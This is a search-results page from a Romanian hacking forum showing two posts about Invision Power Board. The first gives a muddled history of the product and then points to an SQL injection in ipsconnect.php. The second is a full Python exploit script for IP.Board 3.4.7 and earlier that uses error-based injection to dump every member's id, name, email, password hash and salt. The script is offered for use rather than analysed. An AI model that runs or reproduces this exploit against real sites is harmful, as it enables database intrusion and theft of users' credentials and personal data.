Jump to content

Search the Community

Showing results for tags 'board'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 2 results

  1. What is IPB (Invision Power Board) ? : Invision Power Board is a Software Forum Designed and Made by Invision Power Services. Invision Power Services (IPS) was created in 2002 by Charles Warner and Matt Mecham after they left Jarvis Entertainment Group. It is a forum which is on or made on MySQL Database, The Invision Power Board is written or developed on PHP Language. While Invision Power Board is a commercially Public sold product, there is a large modding community and there are many of these modifications which are free. The IPB (Invision Power Board) releases a series of thier Product Versions. The First Version releases of Invision Power Board were available as a download free charge under a proprietary license. The version 1.3 is merely used on free of costs forum hosts such as Invision-Free. Since these were released many exploits had been found and they keep updating and patching them. The Second Version was exact like 1.3.1, the same liscence too it was also a free of cost forum host. But after there first update release the version 2.0.1 the download limit was replaced with 5000Posts, 1000 threads a free demo. Many users were got upset with that. The version 3.x was released in 2009. It was a great milestone for IPB Company because of the Forum Software. The version 3.x released in 2010 the modified version as we saw the Modification made by the IPB. The Search Engine Optimization, its integration with Social Networking Websites like Facebook, Twitter etc. The Version 3.x was really a great product by IPB unless an exploit has been found in it . And it was SQL – Injection exploit. The Vulnerable Paramter is in ‘/interface/ipsconnect/ipsconnect.php’ There is a $_POST Parameter Vulnerability there.. Post Parameter : act=login&idType=id&id=’id here’ <-- Here is the Vulnerable Parameter. the $_POST['id'] parameter is vulnerable. It can easily be exploited with Error Based SQL Injection or Blind Based SQL Injection. There's Many exploit have been made of this exploit. This is high-level vulnerability as many sites are on IPB Forum. Exploit here: Private Paste - Pastie
  2. #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway@safe-mail.net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable # Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs print '\n\n---------------------------------------------------------------------------------' print 'Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs' print '---------Script has been modified for different table prefix XXX_members---------' print '---------------------------------------------------------------------------------\n\n\n' url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ') url = url.rstrip('/') ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1') n = inject('SELECT COUNT(*) FROM %s' % members_table) print '----------------------------------------------------------------------------' print '* Found %s users' % n print '----------------------------------------------------------------------------' for j in range(int(n)): print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j)) print '{:20s} {:20s}'.format('Name',get('name', members_table, j)) print '{:20s} {:20s}'.format('Email',get('email', members_table, j)) print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j)) print '----------------------------------------------------------------------------' Video: https://vimeo.com/111863081 Credit: Makman
×
×
  • Create New...